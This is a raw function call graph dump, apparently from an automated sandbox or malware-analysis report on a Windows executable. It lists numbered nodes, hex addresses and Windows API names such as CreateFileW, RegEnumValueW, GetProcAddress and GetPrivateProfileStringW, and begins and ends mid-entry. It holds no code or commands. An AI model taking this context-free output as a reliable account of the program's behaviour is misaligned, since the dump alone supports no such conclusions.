39057->39056 39059 406214 22 API calls 39057->39059 39061 40e0ea 39058->39061 39059->39056 39060->39048 39062 4096dc CreateFileW 39061->39062 39063 40e0f1 CreateFileMappingW 39062->39063 39064 40e140 CloseHandle CloseHandle 39063->39064 39065 40e10b MapViewOfFile 39063->39065 39064->39055 39066 40e13b CloseHandle 39065->39066 39067 40e11f WriteFile UnmapViewOfFile 39065->39067 39066->39064 39067->39066 39069 40e18c 39068->39069 39070 406b90 11 API calls 39069->39070 39071 40e19f 39070->39071 39072 40e1a7 memset 39071->39072 39073 40e299 39071->39073 39078 40e1e8 39072->39078 39074 4069a3 ??3@YAXPAX free 39073->39074 39075 40e2a4 39074->39075 39075->39041 39076 406e8f 13 API calls 39076->39078 39077 406b53 SetFilePointerEx ReadFile 39077->39078 39078->39076 39078->39077 39079 40e283 39078->39079 39080 40dd50 _wcsicmp 39078->39080 39084 40742e 8 API calls 39078->39084 39085 40aae3 wcslen wcslen _memicmp 39078->39085 39086 40e244 _snwprintf 39078->39086 39081 40e291 39079->39081 39082 40e288 free 39079->39082 39080->39078 39083 40aa04 free 39081->39083 39082->39081 39083->39073 39084->39078 39085->39078 39087 40a8d0 7 API calls 39086->39087 39087->39078 39088->39041 39089->39026 39092 40a980 39090->39092 39091 40a8bb 39091->38951 39091->38952 39092->39091 39093 40a995 _wcsicmp 39092->39093 39094 40a99c wcscmp 39092->39094 39093->39092 39094->39092 39095->38955 39096->38959 39098 40aa23 RegEnumValueW 39097->39098 39098->38966 39098->38967 39100 405335 39099->39100 39101 40522a 39099->39101 39100->38548 39102 40b2cc 27 API calls 39101->39102 39103 405234 39102->39103 39104 40a804 8 API calls 39103->39104 39105 40523a 39104->39105 39144 40b273 39105->39144 39107 405248 _mbscpy _mbscat GetProcAddress 39108 40b273 27 API calls 39107->39108 39109 405279 39108->39109 39147 405211 GetProcAddress 39109->39147 39111 405282 39112 40b273 27 API calls 39111->39112 39113 40528f 39112->39113 39148 405211 GetProcAddress 39113->39148 39115 405298 39116 40b273 27 API calls 39115->39116 39117 4052a5 39116->39117 39149 405211 GetProcAddress 39117->39149 39119 4052ae 39120 40b273 27 API calls 39119->39120 39121 4052bb 39120->39121 39150 405211 GetProcAddress 39121->39150 39123 4052c4 39124 40b273 27 API calls 39123->39124 39125 4052d1 39124->39125 39151 405211 GetProcAddress 39125->39151 39127 4052da 39128 40b273 27 API calls 39127->39128 39129 4052e7 39128->39129 39152 405211 GetProcAddress 39129->39152 39131 4052f0 39132 40b273 27 API calls 39131->39132 39133 4052fd 39132->39133 39153 405211 GetProcAddress 39133->39153 39135 405306 39136 40b273 27 API calls 39135->39136 39137 405313 39136->39137 39154 405211 GetProcAddress 39137->39154 39139 40531c 39140 40b273 27 API calls 39139->39140 39141 405329 39140->39141 39155 405211 GetProcAddress 39141->39155 39143 405332 39143->39100 39145 40b58d 27 API calls 39144->39145 39146 40b18c 39145->39146 39146->39107 39147->39111 39148->39115 39149->39119 39150->39123 39151->39127 39152->39131 39153->39135 39154->39139 39155->39143 39157 405220 39 API calls 39156->39157 39158 405369 39157->39158 39158->38984 39158->38985 39159->38988 39160->38991 39161->38987 39162->38985 39164 40440c FreeLibrary 39163->39164 39165 40436d 39164->39165 39166 40a804 8 API calls 39165->39166 39167 404377 39166->39167 39168 404383 39167->39168 39169 404405 39167->39169 39170 40b273 27 API calls 39168->39170 39169->38557 39169->38559 39169->38560 39171 40438d GetProcAddress 39170->39171 39172 40b273 27 API calls 39171->39172 39173 4043a7 GetProcAddress 39172->39173 39174 40b273 27 API calls 39173->39174 39175 4043ba GetProcAddress 39174->39175 39176 40b273 27 API calls 39175->39176 39177 4043ce GetProcAddress 39176->39177 39178 40b273 27 API calls 39177->39178 39179 4043e2 GetProcAddress 39178->39179 39180 4043f1 39179->39180 39181 4043f7 39180->39181 39182 40440c FreeLibrary 39180->39182 39181->39169 39182->39169 39184 404413 FreeLibrary 39183->39184 39185 40441e 39183->39185 39184->39185 39185->38574 39186->38565 39188 40442e 39187->39188 39189 40447e 39187->39189 39190 40b2cc 27 API calls 39188->39190 39189->38565 39191 404438 39190->39191 39192 40a804 8 API calls 39191->39192 39193 40443e 39192->39193 39194 404445 39193->39194 39195 404467 39193->39195 39196 40b273 27 API calls 39194->39196 39195->39189 39197 404475 FreeLibrary 39195->39197 39198 40444f GetProcAddress 39196->39198 39197->39189 39198->39195 39199 404460 39198->39199 39199->39195 39201 4135f6 39200->39201 39202 4135eb FreeLibrary 39200->39202 39201->38577 39202->39201 39204 4449c4 39203->39204 39205 444a52 39203->39205 39206 40b2cc 27 API calls 39204->39206 39205->38594 39205->38595 39207 4449cb 39206->39207 39208 40a804 8 API calls 39207->39208 39209 4449d1 39208->39209 39210 40b273 27 API calls 39209->39210 39211 4449dc GetProcAddress 39210->39211 39212 40b273 27 API calls 39211->39212 39213 4449f3 GetProcAddress 39212->39213 39214 40b273 27 API calls 39213->39214 39215 444a04 GetProcAddress 39214->39215 39216 40b273 27 API calls 39215->39216 39217 444a15 GetProcAddress 39216->39217 39218 40b273 27 API calls 39217->39218 39219 444a26 GetProcAddress 39218->39219 39220 40b273 27 API calls 39219->39220 39221 444a37 GetProcAddress 39220->39221 39222 40b273 27 API calls 39221->39222 39223 444a48 GetProcAddress 39222->39223 39223->39205 39224->38605 39225->38605 39226->38605 39227->38605 39228->38596 39230 403a29 39229->39230 39244 403bed memset memset 39230->39244 39232 403ae7 39257 40b1ab free free 39232->39257 39233 403a3f memset 39239 403a2f 39233->39239 39235 403aef 39235->38612 39236 409b98 GetFileAttributesW 39236->39239 39237 40a8d0 7 API calls 39237->39239 39238 409d1f 6 API calls 39238->39239 39239->39232 39239->39233 39239->39236 39239->39237 39239->39238 39241 40a051 GetFileTime CloseHandle 39240->39241 39242 4039ca CompareFileTime 39240->39242 39241->39242 39242->38612 39243->38613 39245 414c2e 16 API calls 39244->39245 39246 403c38 39245->39246 39247 409719 2 API calls 39246->39247 39248 403c3f wcscat 39247->39248 39249 414c2e 16 API calls 39248->39249 39250 403c61 39249->39250 39251 409719 2 API calls 39250->39251 39252 403c68 wcscat 39251->39252 39258 403af5 39252->39258 39255 403af5 20 API calls 39256 403c95 39255->39256 39256->39239 39257->39235 39259 403b02 39258->39259 39260 40ae18 9 API calls 39259->39260 39268 403b37 39260->39268 39261 403bdb 39263 40aebe FindClose 39261->39263 39262 40add4 wcscmp wcscmp 39262->39268 39264 403be6 39263->39264 39264->39255 39265 40ae18 9 API calls 39265->39268 39266 40ae51 9 API calls 39266->39268 39267 40aebe FindClose 39267->39268 39268->39261 39268->39262 39268->39265 39268->39266 39268->39267 39269 40a8d0 7 API calls 39268->39269 39269->39268 39271 409d1f 6 API calls 39270->39271 39272 404190 39271->39272 39285 409b98 GetFileAttributesW 39272->39285 39274 40419c 39275 4041a7 6 API calls 39274->39275 39276 40435c 39274->39276 39278 40424f 39275->39278 39276->38639 39278->39276 39279 40425e memset 39278->39279 39281 409d1f 6 API calls 39278->39281 39282 40a8ab 9 API calls 39278->39282 39286 414842 39278->39286 39279->39278 39280 404296 wcscpy 39279->39280 39280->39278 39281->39278 39283 4042b6 memset memset _snwprintf wcscpy 39282->39283 39283->39278 39284->38637 39285->39274 39289 41443e 39286->39289 39288 414866 39288->39278 39290 41444b 39289->39290 39291 414451 39290->39291 39292 4144a3 GetPrivateProfileStringW 39290->39292 39293 414491 39291->39293 39294 414455 wcschr 39291->39294 39292->39288 39295 414495 WritePrivateProfileStringW 39293->39295 39294->39293 39296 414463 _snwprintf 39294->39296 39295->39288 39296->39295 39297->38643 39299 40b2cc 27 API calls 39298->39299 39300 409615 39299->39300 39301 409d1f 6 API calls 39300->39301 39302 409625 39301->39302 39327 409b98 GetFileAttributesW 39302->39327 39304 409634 39305 409648 39304->39305 39328 4091b8 memset 39304->39328 39307 40b2cc 27 API calls 39305->39307 39309 408801 39305->39309 39308 40965d 39307->39308 39310 409d1f 6 API calls 39308->39310 39309->38646 39309->38647 39311 40966d 39310->39311 39380 409b98 GetFileAttributesW 39311->39380 39313 40967c 39313->39309 39314 409681 39313->39314 39381 409529 72 API calls 39314->39381 39316 409690 39316->39309 39317->38669 39318->38646 39319->38674 39320->38646 39327->39304 39382 40a6e6 WideCharToMultiByte 39328->39382 39330 409202 39383 444432 39330->39383 39333 40b273 27 API calls 39334 409236 39333->39334 39429 438552 39334->39429 39337 409383 39339 40b273 27 API calls 39337->39339 39341 409399 39339->39341 39340 409254 39342 40937b 39340->39342 39450 4253cf 17 API calls 39340->39450 39343 438552 134 API calls 39341->39343 39454 424f26 123 API calls 39342->39454 39361 4093a3 39343->39361 39346 409267 39451 4253cf 17 API calls 39346->39451 39347 4094ff 39458 443d90 39347->39458 39350 4251c4 137 API calls 39350->39361 39352 409507 39360 40951d 39352->39360 39478 408f2f 77 API calls 39352->39478 39354 4093df 39457 424f26 123 API calls 39354->39457 39358 4253cf 17 API calls 39358->39361 39360->39305 39361->39347 39361->39350 39361->39354 39361->39358 39363 4093e4 39361->39363 39455 4253af 17 API calls 39363->39455 39370 4093ed 39456 4253af 17 API calls 39370->39456 39373 4093f9 39373->39354 39374 409409 memcmp 39373->39374 39374->39354 39375 409421 memcmp 39374->39375 39376 4094a4 memcmp 39375->39376 39377 409435 39375->39377 39376->39354 39377->39354 39380->39313 39381->39316 39382->39330 39479 4438b5 39383->39479 39385 44444c 39391 409215 39385->39391 39493 415a6d 39385->39493 39387 4442e6 11 API calls 39389 44469e 39387->39389 39388 444486 39390 4444b9 memcpy 39388->39390 39428 4444a4 39388->39428 39389->39391 39393 443d90 111 API calls 39389->39393 39497 415258 39390->39497 39391->39333 39391->39360 39393->39391 39394 444524 39395 444541 39394->39395 39396 44452a 39394->39396 39500 444316 39395->39500 39397 416935 16 API calls 39396->39397 39397->39428 39400 444316 18 API calls 39401 444563 39400->39401 39402 444316 18 API calls 39401->39402 39403 44456f 39402->39403 39404 444316 18 API calls 39403->39404 39405 44457f 39404->39405 39405->39428 39514 432d4e 39405->39514 39428->39387 39567 438460 39429->39567 39431 409240 39431->39337 39432 4251c4 39431->39432 39579 424f07 39432->39579 39434 4251e4 39435 4251f7 39434->39435 39436 4251e8 39434->39436 39587 4250f8 39435->39587 39586 4446ea 11 API calls 39436->39586 39438 4251f2 39438->39340 39440 425209 39443 425249 39440->39443 39446 4250f8 127 API calls 39440->39446 39447 425287 39440->39447 39595 4384e9 135 API calls 39440->39595 39596 424f74 124 API calls 39440->39596 39443->39447 39446->39440 39450->39346 39454->39337 39455->39370 39456->39373 39457->39347 39459 443da3 39458->39459 39460 443db6 39458->39460 39603 41707a 11 API calls 39459->39603 39460->39352 39462 443da8 39463 443dbc 39462->39463 39464 443dac 39462->39464 39605 4300e8 memset memset memcpy 39463->39605 39604 4446ea 11 API calls 39464->39604 39478->39360 39480 4438d0 39479->39480 39491 4438c9 39479->39491 39481 415378 memcpy memcpy 39480->39481 39482 4438d5 39481->39482 39483 4154e2 10 API calls 39482->39483 39484 443906 39482->39484 39482->39491 39483->39484 39485 443970 memset 39484->39485 39484->39491 39487 44398b 39485->39487 39486 4439a0 39488 415700 10 API calls 39486->39488 39486->39491 39487->39486 39490 41975c 10 API calls 39487->39490 39489 4439c0 39488->39489 39489->39491 39492 418981 10 API calls 39489->39492 39490->39486 39491->39385 39492->39491 39494 415a77 39493->39494 39495 415a8d 39494->39495 39496 415a7e memset 39494->39496 39495->39388 39496->39495 39498 4438b5 11 API calls 39497->39498 39499 41525d 39498->39499 39499->39394 39501 444328 39500->39501 39502 444423 39501->39502 39503 44434e 39501->39503 39504 4446ea 11 API calls 39502->39504 39505 432d4e memset memset memcpy 39503->39505 39511 444381 39504->39511 39506 44435a 39505->39506 39508 444375 39506->39508 39513 44438b 39506->39513 39507 432d4e memset memset memcpy 39509 4443ec 39507->39509 39510 416935 16 API calls 39508->39510 39509->39511 39512 416935 16 API calls 39509->39512 39510->39511 39511->39400 39512->39511 39513->39507 39515 432d65 39514->39515 39516 432d58 39514->39516 39568 41703f 11 API calls 39567->39568 39569 43847a 39568->39569 39570 43848a 39569->39570 39571 43847e 39569->39571 39573 438270 134 API calls 39570->39573 39572 4446ea 11 API calls 39571->39572 39575 438488 39572->39575 39574 4384aa 39573->39574 39574->39575 39576 424f26 123 API calls 39574->39576 39575->39431 39577 4384bb 39576->39577 39578 438270 134 API calls 39577->39578 39578->39575 39580 424f1f 39579->39580 39581 424f0c 39579->39581 39583 424eea 11 API calls 39580->39583 39582 416760 11 API calls 39581->39582 39584 424f18 39582->39584 39585 424f24 39583->39585 39584->39434 39585->39434 39586->39438 39588 425108 39587->39588 39594 42510d 39587->39594 39589 424f74 124 API calls 39588->39589 39589->39594 39590 42569b 125 API calls 39591 42516e 39590->39591 39593 415c7d 16 API calls 39591->39593 39592 425115 39592->39440 39593->39592 39594->39590 39594->39592 39595->39440 39596->39440 39603->39462 39604->39460 39636 413f4f 39609->39636 39612 413f37 K32GetModuleFileNameExW 39613 413f4a 39612->39613 39613->38705 39615 413969 wcscpy 39614->39615 39616 41396c wcschr 39614->39616 39628 413a3a 39615->39628 39616->39615 39618 41398e 39616->39618 39641 4097f7 wcslen wcslen _memicmp 39618->39641 39620 41399a 39621 4139a4 memset 39620->39621 39622 4139e6 39620->39622 39642 409dd5 GetWindowsDirectoryW wcscpy 39621->39642 39624 413a31 wcscpy 39622->39624 39625 4139ec memset 39622->39625 39624->39628 39643 409dd5 GetWindowsDirectoryW wcscpy 39625->39643 39626 4139c9 wcscpy wcscat 39626->39628 39628->38705 39629 413a11 memcpy wcscat 39629->39628 39631 413cb0 GetModuleHandleW 39630->39631 39632 413cda 39630->39632 39631->39632 39633 413cbf GetProcAddress 39631->39633 39634 413ce3 GetProcessTimes 39632->39634 39635 413cf6 39632->39635 39633->39632 39634->38708 39635->38708 39637 413f2f 39636->39637 39638 413f54 39636->39638 39637->39612 39637->39613 39639 40a804 8 API calls 39638->39639 39640 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39639->39640 39640->39637 39641->39620 39642->39626 39643->39629 39644->38729 39645->38752 39647 409cf9 GetVersionExW 39646->39647 39648 409d0a 39646->39648 39647->39648 39648->38758 39648->38763 39649->38764 39650->38767 39651->38769 39652->38835 39654 40bba5 39653->39654 39701 40cc26 39654->39701 39657 40bd4b 39722 40cc0c 39657->39722 39662 40b2cc 27 API calls 39663 40bbef 39662->39663 39729 40ccf0 _wcsicmp 39663->39729 39665 40bbf5 39665->39657 39730 40ccb4 6 API calls 39665->39730 39667 40bc26 39668 40cf04 17 API calls 39667->39668 39669 40bc2e 39668->39669 39670 40bd43 39669->39670 39671 40b2cc 27 API calls 39669->39671 39672 40cc0c 4 API calls 39670->39672 39673 40bc40 39671->39673 39672->39657 39731 40ccf0 _wcsicmp 39673->39731 39675 40bc46 39675->39670 39676 40bc61 memset memset WideCharToMultiByte 39675->39676 39732 40103c strlen 39676->39732 39678 40bcc0 39679 40b273 27 API calls 39678->39679 39680 40bcd0 memcmp 39679->39680 39680->39670 39681 40bce2 39680->39681 39682 404423 37 API calls 39681->39682 39683 40bd10 39682->39683 39683->39670 39684 40bd3a LocalFree 39683->39684 39685 40bd1f memcpy 39683->39685 39684->39670 39685->39684 39686->38850 39688 409a74 GetTempFileNameW 39687->39688 39689 409a66 GetWindowsDirectoryW 39687->39689 39688->38849 39689->39688 39690->38887 39691->38887 39692->38887 39693->38887 39694->38887 39695->38887 39696->38887 39697->38887 39698->38887 39699->38862 39700->38884 39733 4096c3 CreateFileW 39701->39733 39703 40cc34 39704 40cc3d GetFileSize 39703->39704 39712 40bbca 39703->39712 39705 40afcf 2 API calls 39704->39705 39706 40cc64 39705->39706 39734 40a2ef ReadFile 39706->39734 39708 40cc71 39735 40ab4a MultiByteToWideChar 39708->39735 39710 40cc95 CloseHandle 39711 40b04b ??3@YAXPAX 39710->39711 39711->39712 39712->39657 39713 40cf04 39712->39713 39714 40b633 free 39713->39714 39715 40cf14 39714->39715 39741 40b1ab free free 39715->39741 39717 40bbdd 39717->39657 39717->39662 39718 40cf1b 39718->39717 39720 40cfef 39718->39720 39742 40cd4b 39718->39742 39721 40cd4b 14 API calls 39720->39721 39721->39717 39723 40b633 free 39722->39723 39724 40cc15 39723->39724 39725 40aa04 free 39724->39725 39726 40cc1d 39725->39726 39791 40b1ab free free 39726->39791 39728 40b7d4 memset CreateFileW 39728->38842 39728->38843 39729->39665 39730->39667 39731->39675 39732->39678 39733->39703 39734->39708 39736 40ab93 39735->39736 39737 40ab6b 39735->39737 39736->39710 39738 40a9ce 4 API calls 39737->39738 39739 40ab74 39738->39739 39740 40ab7c MultiByteToWideChar 39739->39740 39740->39736 39741->39718 39743 40cd7b 39742->39743 39776 40aa29 39743->39776 39745 40cef5 39746 40aa04 free 39745->39746 39747 40cefd 39746->39747 39747->39718 39749 40aa29 6 API calls 39750 40ce1d 39749->39750 39751 40aa29 6 API calls 39750->39751 39752 40ce3e 39751->39752 39753 40ce6a 39752->39753 39784 40abb7 wcslen memmove 39752->39784 39754 40ce9f 39753->39754 39787 40abb7 wcslen memmove 39753->39787 39756 40a8d0 7 API calls 39754->39756 39759 40ceb5 39756->39759 39757 40ce56 39785 40aa71 wcslen 39757->39785 39765 40a8d0 7 API calls 39759->39765 39761 40ce8b 39788 40aa71 wcslen 39761->39788 39762 40ce5e 39786 40abb7 wcslen memmove 39762->39786 39768 40cecb 39765->39768 39766 40ce93 39789 40abb7 wcslen memmove 39766->39789 39790 40d00b malloc memcpy free free 39768->39790 39770 40cedd 39771 40aa04 free 39770->39771 39772 40cee5 39771->39772 39773 40aa04 free 39772->39773 39774 40ceed 39773->39774 39775 40aa04 free 39774->39775 39775->39745 39777 40aa33 39776->39777 39778 40aa63 39776->39778 39779 40aa44 39777->39779 39780 40aa38 wcslen 39777->39780 39778->39745 39778->39749 39781 40a9ce malloc memcpy free free 39779->39781 39780->39779 39782 40aa4d 39781->39782 39782->39778 39783 40aa51 memcpy 39782->39783 39783->39778 39784->39757 39785->39762 39786->39753 39787->39761 39788->39766 39789->39754 39790->39770 39791->39728 39792->38902 39793->38910 39803 44def7 39804 44df07 39803->39804 39805 44df00 ??3@YAXPAX 39803->39805 39806 44df17 39804->39806 39807 44df10 ??3@YAXPAX 39804->39807 39805->39804 39808 44df27 39806->39808 39809 44df20 ??3@YAXPAX 39806->39809 39807->39806 39810 44df37 39808->39810 39811 44df30 ??3@YAXPAX 39808->39811 39809->39808 39811->39810 37668 44dea5 37669 44deb5 FreeLibrary 37668->37669 37670 44dec3 37668->37670 37669->37670 39812 4148b6 FindResourceW 39813 4148cf SizeofResource 39812->39813 39816 4148f9 39812->39816 39814 4148e0 LoadResource 39813->39814 39813->39816 39815 4148ee LockResource 39814->39815 39814->39816 39815->39816 37847 415304 free 39817 441b3f 39827 43a9f6 39817->39827 39819 441b61 40000 4386af memset 39819->40000 39821 44189a 39822 4418e2 39821->39822 39826 442bd4 39821->39826 39823 4418ea 39822->39823 40001 4414a9 12 API calls 39822->40001 39826->39823 40002 441409 memset 39826->40002 39828 43aa20 39827->39828 39829 43aadf 39827->39829 39828->39829 39830 43aa34 memset 39828->39830 39829->39819 39831 43aa56 39830->39831 39832 43aa4d 39830->39832 40003 43a6e7 39831->40003 40011 42c02e memset 39832->40011 39837 43aad3 40013 4169a7 11 API calls 39837->40013 39838 43aaae 39838->39829 39838->39837 39853 43aae5 39838->39853 39839 43ac18 39842 43ac47 39839->39842 40015 42bbd5 memcpy memcpy memcpy memset memcpy 39839->40015 39843 43aca8 39842->39843 40016 438eed 16 API calls 39842->40016 39846 43acd5 39843->39846 40018 4233ae 11 API calls 39843->40018 40019 423426 11 API calls 39846->40019 39847 43ac87 40017 4233c5 16 API calls 39847->40017 39851 43ace1 40020 439811 163 API calls 39851->40020 39852 43a9f6 161 API calls 39852->39853 39853->39829 39853->39839 39853->39852 40014 439bbb 22 API calls 39853->40014 39855 43acfd 39861 43ad2c 39855->39861 40021 438eed 16 API calls 39855->40021 39857 43ad19 40022 4233c5 16 API calls 39857->40022 39858 43ad58 40023 44081d 163 API calls 39858->40023 39861->39858 39864 43add9 39861->39864 39863 43ae3a memset 39865 43ae73 39863->39865 39864->39864 40027 423426 11 API calls 39864->40027 40028 42e1c0 147 API calls 39865->40028 39866 43adab 40025 438c4e 163 API calls 39866->40025 39869 43ad6c 39869->39829 39869->39866 40024 42370b memset memcpy memset 39869->40024 39870 43adcc 40026 440f84 12 API calls 39870->40026 39871 43ae96 40029 42e1c0 147 API calls 39871->40029 39875 43aea8 39876 43aec1 39875->39876 40030 42e199 147 API calls 39875->40030 39877 43af00 39876->39877 40031 42e1c0 147 API calls 39876->40031 39877->39829 39881 43af1a 39877->39881 39882 43b3d9 39877->39882 40032 438eed 16 API calls 39881->40032 39887 43b3f6 39882->39887 39891 43b4c8 39882->39891 39884 43b60f 39884->39829 40091 4393a5 17 API calls 39884->40091 39885 43af2f 40033 4233c5 16 API calls 39885->40033 40073 432878 12 API calls 39887->40073 39889 43af51 40034 423426 11 API calls 39889->40034 39897 43b4f2 39891->39897 40079 42bbd5 memcpy memcpy memcpy memset memcpy 39891->40079 39893 43af7d 40035 423426 11 API calls 39893->40035 40080 43a76c 21 API calls 39897->40080 39898 43b529 40081 44081d 163 API calls 39898->40081 39899 43b462 40075 423330 11 API calls 39899->40075 39900 43af94 40036 423330 11 API calls 39900->40036 39904 43b47e 39909 43b497 39904->39909 40076 42374a memcpy memset memcpy memcpy memcpy 39904->40076 39905 43b544 39910 43b55c 39905->39910 40082 42c02e memset 39905->40082 39906 43b428 39906->39899 40074 432b60 16 API calls 39906->40074 39907 43afca 40037 423330 11 API calls 39907->40037 40077 4233ae 11 API calls 39909->40077 40083 43a87a 163 API calls 39910->40083 39911 43afdb 40038 4233ae 11 API calls 39911->40038 39917 43b56c 39920 43b58a 39917->39920 40084 423330 11 API calls 39917->40084 39918 43b4b1 40078 423399 11 API calls 39918->40078 39919 43afee 40039 44081d 163 API calls 39919->40039 40085 440f84 12 API calls 39920->40085 39925 43b4c1 40087 42db80 163 API calls 39925->40087 39927 43b592 40086 43a82f 16 API calls 39927->40086 39930 43b5b4 40088 438c4e 163 API calls 39930->40088 39932 43b5cf 40089 42c02e memset 39932->40089 39934 43b005 39934->39829 39938 43b01f 39934->39938 40040 42d836 163 API calls 39934->40040 39935 43b1ef 40050 4233c5 16 API calls 39935->40050 39938->39935 40048 423330 11 API calls 39938->40048 40049 42d71d 163 API calls 39938->40049 39939 43b212 40051 423330 11 API calls 39939->40051 39940 43b087 40041 4233ae 11 API calls 39940->40041 39941 43add4 39941->39884 40090 438f86 16 API calls 39941->40090 39946 43b22a 40052 42ccb5 11 API calls 39946->40052 39948 43b23f 40053 4233ae 11 API calls 39948->40053 39949 43b10f 40044 423330 11 API calls 39949->40044 39951 43b257 40054 4233ae 11 API calls 39951->40054 39955 43b129 40045 4233ae 11 API calls 39955->40045 39956 43b26e 40055 4233ae 11 API calls 39956->40055 39959 43b09a 39959->39949 40042 42cc15 19 API calls 39959->40042 40043 4233ae 11 API calls 39959->40043 39960 43b282 40056 43a87a 163 API calls 39960->40056 39962 43b13c 40046 440f84 12 API calls 39962->40046 39964 43b29d 40057 423330 11 API calls 39964->40057 39967 43b15f 40047 4233ae 11 API calls 39967->40047 39968 43b2af 39970 43b2b8 39968->39970 39971 43b2ce 39968->39971 40058 4233ae 11 API calls 39970->40058 40059 440f84 12 API calls 39971->40059 39974 43b2c9 40061 4233ae 11 API calls 39974->40061 39975 43b2da 40060 42370b memset memcpy memset 39975->40060 39978 43b2f9 40062 423330 11 API calls 39978->40062 39980 43b30b 40063 423330 11 API calls 39980->40063 39982 43b325 40064 423399 11 API calls 39982->40064 39984 43b332 40065 4233ae 11 API calls 39984->40065 39986 43b354 40066 423399 11 API calls 39986->40066 39988 43b364 40067 43a82f 16 API calls 39988->40067 39990 43b370 40068 42db80 163 API calls 39990->40068 39992 43b380 40069 438c4e 163 API calls 39992->40069 39994 43b39e 40070 423399 11 API calls 39994->40070 39996 43b3ae 40071 43a76c 21 API calls 39996->40071 39998 43b3c3 40072 423399 11 API calls 39998->40072 40000->39821 40001->39823 40002->39826 40004 43a6f5 40003->40004 40005 43a765 40003->40005 40004->40005 40092 42a115 40004->40092 40005->39829 40012 4397fd memset 40005->40012 40009 43a73d 40009->40005 40010 42a115 147 API calls 40009->40010 40010->40005 40011->39831 40012->39838 40013->39829 40014->39853 40015->39842 40016->39847 40017->39843 40018->39846 40019->39851 40020->39855 40021->39857 40022->39861 40023->39869 40024->39866 40025->39870 40026->39941 40027->39863 40028->39871 40029->39875 40030->39876 40031->39876 40032->39885 40033->39889 40034->39893 40035->39900 40036->39907 40037->39911 40038->39919 40039->39934 40040->39940 40041->39959 40042->39959 40043->39959 40044->39955 40045->39962 40046->39967 40047->39938 40048->39938 40049->39938 40050->39939 40051->39946 40052->39948 40053->39951 40054->39956 40055->39960 40056->39964 40057->39968 40058->39974 40059->39975 40060->39974 40061->39978 40062->39980 40063->39982 40064->39984 40065->39986 40066->39988 40067->39990 40068->39992 40069->39994 40070->39996 40071->39998 40072->39941 40073->39906 40074->39899 40075->39904 40076->39909 40077->39918 40078->39925 40079->39897 40080->39898 40081->39905 40082->39910 40083->39917 40084->39920 40085->39927 40086->39925 40087->39930 40088->39932 40089->39941 40090->39884 40091->39829 40093 42a175 40092->40093 40095 42a122 40092->40095 40093->40005 40098 42b13b 147 API calls 40093->40098 40095->40093 40096 42a115 147 API calls 40095->40096 40099 43a174 40095->40099 40123 42a0a8 147 API calls 40095->40123 40096->40095 40098->40009 40113 43a196 40099->40113 40114 43a19e 40099->40114 40100 43a306 40100->40113 40143 4388c4 14 API calls 40100->40143 40103 42a115 147 API calls 40103->40114 40105 43a642 40105->40113 40147 4169a7 11 API calls 40105->40147 40109 43a635 40146 42c02e memset 40109->40146 40113->40095 40114->40100 40114->40103 40114->40113 40124 42ff8c 40114->40124 40132 415a91 40114->40132 40136 4165ff 40114->40136 40139 439504 13 API calls 40114->40139 40140 4312d0 147 API calls 40114->40140 40141 42be4c memcpy memcpy memcpy memset memcpy 40114->40141 40142 43a121 11 API calls 40114->40142 40116 4169a7 11 API calls 40117 43a325 40116->40117 40117->40105 40117->40109 40117->40113 40117->40116 40118 42b5b5 memset memcpy 40117->40118 40119 42bf4c 14 API calls 40117->40119 40122 4165ff 11 API calls 40117->40122 40144 42b63e 14 API calls 40117->40144 40145 42bfcf memcpy 40117->40145 40118->40117 40119->40117 40122->40117 40123->40095 40148 43817e 40124->40148 40126 42ff99 40127 42ffe3 40126->40127 40128 42ffd0 40126->40128 40131 42ff9d 40126->40131 40153 4169a7 11 API calls 40127->40153 40152 4169a7 11 API calls 40128->40152 40131->40114 40133 415a9d 40132->40133 40134 415ab3 40133->40134 40135 415aa4 memset 40133->40135 40134->40114 40135->40134 40302 4165a0 40136->40302 40139->40114 40140->40114 40141->40114 40142->40114 40143->40117 40144->40117 40145->40117 40146->40105 40147->40113 40149 438187 40148->40149 40151 438192 40148->40151 40154 4380f6 40149->40154 40151->40126 40152->40131 40153->40131 40156 43811f 40154->40156 40155 438164 40155->40151 40156->40155 40159 437e5e 40156->40159 40182 4300e8 memset memset memcpy 40156->40182 40183 437d3c 40159->40183 40161 437eb3 40161->40156 40162 437ea9 40162->40161 40167 437f22 40162->40167 40198 41f432 40162->40198 40165 437f06 40245 415c56 11 API calls 40165->40245 40169 432d4e 3 API calls 40167->40169 40170 437f7f 40167->40170 40168 437f95 40246 415c56 11 API calls 40168->40246 40169->40170 40170->40168 40171 43802b 40170->40171 40173 4165ff 11 API calls 40171->40173 40174 438054 40173->40174 40209 437371 40174->40209 40177 43806b 40178 438094 40177->40178 40247 42f50e 138 API calls 40177->40247 40181 437fa3 40178->40181 40248 4300e8 memset memset memcpy 40178->40248 40181->40161 40249 41f638 104 API calls 40181->40249 40182->40156 40184 437d69 40183->40184 40187 437d80 40183->40187 40250 437ccb 11 API calls 40184->40250 40186 437d76 40186->40162 40187->40186 40188 437da3 40187->40188 40190 437d90 40187->40190 40191 438460 134 API calls 40188->40191 40190->40186 40254 437ccb 11 API calls 40190->40254 40194 437dcb 40191->40194 40192 437de8 40253 424f26 123 API calls 40192->40253 40194->40192 40251 444283 13 API calls 40194->40251 40196 437dfc 40252 437ccb 11 API calls 40196->40252 40199 41f54d 40198->40199 40205 41f44f 40198->40205 40200 41f466 40199->40200 40284 41c635 memset memset 40199->40284 40200->40165 40200->40167 40205->40200 40207 41f50b 40205->40207 40255 41f1a5 40205->40255 40280 41c06f memcmp 40205->40280 40281 41f3b1 90 API calls 40205->40281 40282 41f398 86 API calls 40205->40282 40207->40199 40207->40200 40283 41c295 86 API calls 40207->40283 40285 41703f 40209->40285 40211 437399 40212 43739d 40211->40212 40214 4373ac 40211->40214 40292 4446ea 11 API calls 40212->40292 40215 416935 16 API calls 40214->40215 40216 4373ca 40215->40216 40217 438460 134 API calls 40216->40217 40222 4251c4 137 API calls 40216->40222 40226 415a91 memset 40216->40226 40229 43758f 40216->40229 40241 437584 40216->40241 40244 437d3c 135 API calls 40216->40244 40293 425433 13 API calls 40216->40293 40294 425413 17 API calls 40216->40294 40295 42533e 16 API calls 40216->40295 40296 42538f 16 API calls 40216->40296 40297 42453e 123 API calls 40216->40297 40217->40216 40218 4375bc 40220 415c7d 16 API calls 40218->40220 40221 4375d2 40220->40221 40223 4442e6 11 API calls 40221->40223 40243 4373a7 40221->40243 40222->40216 40224 4375e2 40223->40224 40224->40243 40300 444283 13 API calls 40224->40300 40226->40216 40298 42453e 123 API calls 40229->40298 40232 4375f4 40235 437620 40232->40235 40236 43760b 40232->40236 40234 43759f 40237 416935 16 